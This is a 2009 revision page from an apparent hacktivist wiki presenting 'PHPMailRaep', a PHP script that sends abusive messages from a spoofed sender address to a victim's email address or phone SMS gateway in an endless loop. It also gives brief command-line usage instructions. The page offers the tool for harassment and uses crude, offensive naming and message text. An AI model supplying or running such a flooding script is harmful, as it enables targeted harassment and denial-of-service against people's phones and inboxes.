PHPMailRaep: Difference between revisions

From /i/nsurgency W/i/ki
Jump to navigationJump to search
>Janus zeal
Created page with 'SMSRaep is a simple script used to spam cell phones. == Code == <pre><?php // Simple phpphonerape by janus zeal // irc.netchan.org #insurgency $to = "phonenumber@emaildomain"; $...'
 
>Janus zeal
m moved SMSRaep to PHPMailRaep
 
(4 intermediate revisions by the same user not shown)
Line 1: Line 1:
SMSRaep is a simple script used to spam cell phones.
PHPMailRaep is a simple script to spam [[SMSRape|phones]] and email addresses.


== Code ==
== Code ==
<pre><?php
<pre><?php
// Simple phpphonerape by janus zeal
// Simple PHPMailRaep by janus zeal
// irc.netchan.org #insurgency
// irc.netchan.org #insurgency
$to = "phonenumber@emaildomain";
$to = "email address";
$subject = "asshole of the year";
$subject = "asshole of the year";
$message = "haha";
$message = "haha";

Latest revision as of 23:18, 6 March 2009

PHPMailRaep is a simple script to spam phones and email addresses.

Code[edit]

<?php
// Simple PHPMailRaep by janus zeal
// irc.netchan.org #insurgency
$to = "email address";
$subject = "asshole of the year";
$message = "haha";
$from = "pedrobear@internet.br";
// From address doesn't have to be valid, but it should look like a real email
// Don't edit below here
$count = 0;
$headers = "From: $from";
while (1) {
        $count++;
        mail($to,$subject,$message,$headers);
        print "Message sent, Now @ " . $count . "\n";
}
?>

Use[edit]

Run from the nix command line, sendmail and php-cgi are required.

php-cgi mail.php

Ctrl-c to exit (Not pretty, I know. :\)